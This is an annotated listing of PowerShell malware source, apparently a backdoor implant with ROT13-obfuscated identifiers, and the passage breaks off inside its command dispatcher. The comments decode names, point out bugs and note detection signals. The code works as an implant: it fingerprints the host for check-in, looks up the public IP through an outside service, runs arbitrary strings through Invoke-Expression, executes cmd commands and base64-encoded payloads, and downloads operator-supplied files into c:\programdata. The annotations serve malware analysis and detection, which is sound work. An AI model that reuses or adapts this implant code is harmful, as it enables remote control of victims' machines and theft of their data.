| # fuggcTRG -- ROT13 of "shttpGET": plain HTTP GET of an absolute URL ($hey = ROT13 "url"). | |
| # Used by the public-IP lookup inside vasbvavg. Unlike uggcTRG it does not prefix $global:url, | |
| # does not rotate the proxy/C2 on failure and returns "" rather than "error". | |
| function fuggcTRG($hey){ | |
| try | |
| { | |
| # $jroerd = ROT13 "webreq". | |
| $jroerd = [System.Net.WebRequest]::Create($hey); | |
| # System proxy plus the logged-on user's default credentials, so the lookup also succeeds | |
| # behind an authenticating corporate proxy. No User-Agent is set anywhere in this function. | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $jroerd.Method = "GET"; | |
| # $erfc = "resp", $qngn = "data", $erf_qngn = "res_data", $erfhyg = "result". | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| # Whole body is read into memory; neither the response nor the reader is ever disposed. | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } | |
| catch { | |
| # Any failure (DNS, proxy authentication, or a non-success status, which GetResponse | |
| # raises as a WebException) is collapsed to an empty string. | |
| $erfhyg = "" | |
| } | |
| return $erfhyg | |
| } | |
| # Riny -- ROT13 of "Eval": executes an operator-supplied string ($pzq = ROT13 "cmd") as | |
| # PowerShell and returns whatever it produced as one string. This is the implant's | |
| # arbitrary-code-execution primitive; with script block logging enabled the expanded text | |
| # handed to Invoke-Expression is recorded (Microsoft-Windows-PowerShell/Operational, 4104). | |
| function Riny($pzq){ | |
| try{ | |
| # -ErrorAction binds to Invoke-Expression itself, not to the command it runs. $bhg = "out". | |
| $bhg = IEX $pzq -ErrorAction SilentlyContinue | |
| # For "cd ..." the reply is the new working directory. The location change made inside IEX | |
| # persists for the session, so later commands run from there. The prefix test also fires for | |
| # any command that merely begins with the letters "cd". | |
| if($pzq.StartsWith("cd")){$bhg = $PWD;} | |
| $bhg = ($bhg | Out-String) | |
| } catch { | |
| # Terminating errors are reported back to the operator as the exception text. | |
| $bhg = $_.Exception.Message | |
| } | |
| return $bhg | |
| } | |
| # vasbvavg -- ROT13 of "infoinit": builds the host fingerprint sent at check-in. | |
| # Returns "<id>**<sysinfo>", where <id> is the MD5 of the "**"-joined fields assembled at the | |
| # bottom and is also stored in $global:id for later requests. Every nested getter swallows | |
| # its own errors and substitutes a placeholder so one failure cannot abort the check-in. | |
| function vasbvavg(){ | |
| # trgVC = "getIP": local IPv4 from ipconfig (ipconfig.exe is spawned as a child of PowerShell). | |
| # $Zngpurf is ROT13 of "Matches" but is NOT the automatic $Matches variable, so the capture | |
| # group is never actually read -- most likely the identifier obfuscator rewrote the automatic | |
| # variable along with everything else. Expect this field to be empty in real traffic. | |
| function trgVC(){ | |
| try{ | |
| return ($(ipconfig | where {$_ -match 'IPv4.+\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' } | out-null; $Zngpurf[1])); | |
| } catch { | |
| return "ErrorIP"; | |
| } | |
| } | |
| # trgBF = "getOS": Windows edition name read from the registry. | |
| function trgBF(){ | |
| try{ | |
| return ((get-itemproperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ProductName).ProductName) | |
| } catch { | |
| return "ErrorOS"; | |
| } | |
| } | |
| # trgNepu = "getArch": pointer size of *this* PowerShell process, so a 32-bit host process on a | |
| # 64-bit OS is reported as "32-bit". | |
| function trgNepu(){ | |
| try{ | |
| if([System.IntPtr]::Size -eq 4){ | |
| return "32-bit" | |
| } | |
| else{ | |
| return "64-bit" | |
| } | |
| } catch { | |
| return "ErrorArch"; | |
| } | |
| } | |
| # trgQbznva = "getDomain": runs net.exe ("net config workstation", another child process), keeps | |
| # the "Workstation domain" line (-match on an array filters it) and returns its last token. | |
| function trgQbznva(){ | |
| try{ | |
| return ((net config workstation) -match 'Workstation domain\s+\S+$' -replace '.+?(\S+)$','$1'); | |
| } catch { | |
| return "ErrorDomain"; | |
| } | |
| } | |
| # trgUbfgAnzr = "getHostName": an empty name asks DNS for the local host's own entry. | |
| function trgUbfgAnzr(){ | |
| try{ | |
| return ([System.Net.DNS]::GetHostByName('').HostName); | |
| } catch { | |
| return "ErrorHostName"; | |
| } | |
| } | |
| # trgHfreanzr = "getUsername". Two defects: String.Replace is a literal replace, so the | |
| # regex-looking pattern strips nothing, and $ghfr (undefined) is a typo for $ghfre, so the early | |
| # return never fires for a non-empty username. The code therefore always falls through to the | |
| # 8.3 short name of the profile folder via Scripting.FileSystemObject, and to $env:UserName on error. | |
| function trgHfreanzr(){ | |
| try{ | |
| try{ | |
| $sfb = New-Object -ComObject Scripting.FileSystemObject; | |
| $hfre = $env:UserName | |
| $ghfre = $hfre.replace('[^a-zA-Z0-9]','') | |
| if($ghfr -eq $hfre){ | |
| return $hfre | |
| } | |
| return ($sfb.getfolder('c:\\users\\' + $env:UserName).ShortName) | |
| } catch { | |
| return $env:UserName | |
| } | |
| } catch { | |
| return "-" | |
| } | |
| } | |
| # vfNqzva = "isAdmin": "+" when the current token holds the Administrators role, else "". | |
| # Under UAC an unelevated administrator's filtered token does not hold the role, so "+" means | |
| # the session is actually elevated. | |
| function vfNqzva(){ | |
| try{ | |
| $JvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent() | |
| $Cevapvcny = New-Object System.Security.Principal.WindowsPrincipal($JvaqbjfVqragvgl) | |
| $NqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator | |
| if ($Cevapvcny.IsInRole($NqzvaEbyr)) | |
| { | |
| return '+' | |
| } | |
| else | |
| { | |
| return '' | |
| } | |
| } catch { | |
| return "" | |
| } | |
| } | |
| # trgCVC = "getPIP": public IP via an external echo service. powershell.exe contacting an | |
| # IP-lookup service is itself a useful network detection signal for this check-in. | |
| function trgCVC(){ | |
| try{ | |
| $ernyVC = fuggcTRG "https://v4.ident.me/" | |
| return $ernyVC | |
| } catch { | |
| return "ErrorPublicIP" | |
| } | |
| } | |
| # Field order: OS**localIP**arch**hostname**domain**[+]username**publicIP. The admin flag is | |
| # glued directly onto the username (no "**" between them), so "+bob" denotes an elevated | |
| # session. $FlfVasb = ROT13 "SysInfo". | |
| $FlfVasb = trgBF | |
| $FlfVasb += "**" | |
| $FlfVasb += trgVC | |
| $FlfVasb += "**" | |
| $FlfVasb += trgNepu | |
| $FlfVasb += "**" | |
| $FlfVasb += trgUbfgAnzr | |
| $FlfVasb += "**" | |
| $FlfVasb += trgQbznva | |
| $FlfVasb += "**" | |
| $FlfVasb += vfNqzva | |
| $FlfVasb += trgHfreanzr | |
| $FlfVasb += "**" | |
| $FlfVasb += trgCVC | |
| # Victim id = MD5 of the whole fingerprint, so it changes whenever any field (e.g. the public | |
| # IP) changes. | |
| $global:id = zq5trarengbe($FlfVasb) | |
| return ($global:id + '**' + $FlfVasb) | |
| } | |
| # zq5trarengbe -- ROT13 of "md5generator": MD5 of the UTF-8 bytes of $fgeVa ("strIn"), returned | |
| # as 32 uppercase hex characters (BitConverter output with the dashes removed). Used here only | |
| # as the victim identifier built in vasbvavg. | |
| function zq5trarengbe($fgeVa){ | |
| $zq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider | |
| $hgs8 = new-object -TypeName System.Text.UTF8Encoding | |
| $unfu = [System.BitConverter]::ToString($zq5.ComputeHash($hgs8.GetBytes($fgeVa))) | |
| # $unfu = "hash", $bhgchg = "output". | |
| $bhgchg = $unfu.replace('-','') | |
| return $bhgchg | |
| } | |
| function pbzznaq_naq_pbageby($pzq){ | |
| try{ | |
| if($pzq.StartsWith('upload')){ | |
| try{ | |
| $pzq=$pzq.replace('upload ','') | |
| $wc = New-Object System.Net.WebClient | |
| $wc.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $wc.DownloadFile($pzq, ("c:\programdata\" + $pzq.Substring($pzq.LastIndexOf('/'),$pzq.Length-$pzq.LastIndexOf('/')))) | |
| return Riny "pwd" | |
| }catch{ | |
| return $_.Exception.Message | |
| } | |
| } | |
| elseif($pzq.StartsWith('cmd')){ | |
| $pzq=$pzq.replace('cmd ','') | |
| try{ | |
| $bhg = cmd /c $pzq | |
| $bhg = $bhg | Out-String | |
| return $bhg | |
| } catch { | |
| return $_.Exception.Message | |
| } | |
| } | |
| elseif($pzq.StartsWith('b64')){ | |
| $pzq=$pzq.replace('b64 ','') | |
| try{ | |
| $pzq = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($pzq)) | |
| $bhg = Riny $pzq | |
| $bhg = $bhg | Out-String | |
| return $bhg | |
| } catch |